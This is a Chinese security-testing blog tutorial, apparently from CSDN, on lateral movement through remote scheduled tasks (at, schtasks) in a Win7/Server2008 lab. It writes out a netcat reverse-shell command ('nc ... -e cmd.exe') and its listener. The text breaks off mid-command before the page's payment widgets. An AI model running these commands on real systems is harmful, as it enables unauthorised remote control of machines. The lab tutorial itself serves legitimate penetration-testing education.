横向远程命令执行——Windows计划任务

本文介绍了在安全测试中,如何利用Windows系统的at和schtasks命令进行远程命令执行。通过建立IPC$连接,可以在目标系统上创建计划任务,实现横向渗透。在Win7和Server2008环境下,利用nc反弹shell,展示了at命令和schtasks命令的不同用法,后者提供更灵活的参数设置和即时执行功能。完成测试后,别忘了删除创建的计划任务。
摘要由CSDN通过智能技术生成

横向远程命令执行——Windows计划任务


  Windows任务计划程序可以让计算机按照我们的要求在指定时间执行指定的程序,并且可以设置时间间隔重复执行。利用“任务计划”,可以将任何脚本、程序或文档安排在某个最方便的时间运行。

1、 测试环境

  Win7:192.168.11.137
  Server2008:192.168.11.200
  在通过nmap扫描发现内网中存在开放139,445端口存活主机,当我们拿到一个管理员账户时,可通过 atschtasks进行创建任务计划程序进行横向渗透。
在这里插入图片描述
  在演示环境中,为了方便演示,在服务器配置了nc,并在C盘创建了c.bat写入命令 nc 192.168.11.137 4444 -e cmd.exe ,通过nc反弹给攻击机一个交互式的shell。使用 nc -lvp [port] 在攻击机监听4444端口:
在这里插入图片描述

2、 计划任务利用

2.1 at命令

  at命令远程创建计划任务需先建立IPC$连接,否则在执行时会返回拒绝访问。Win8以后已不再支持at命令,使用schtasks替代。

net use \
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值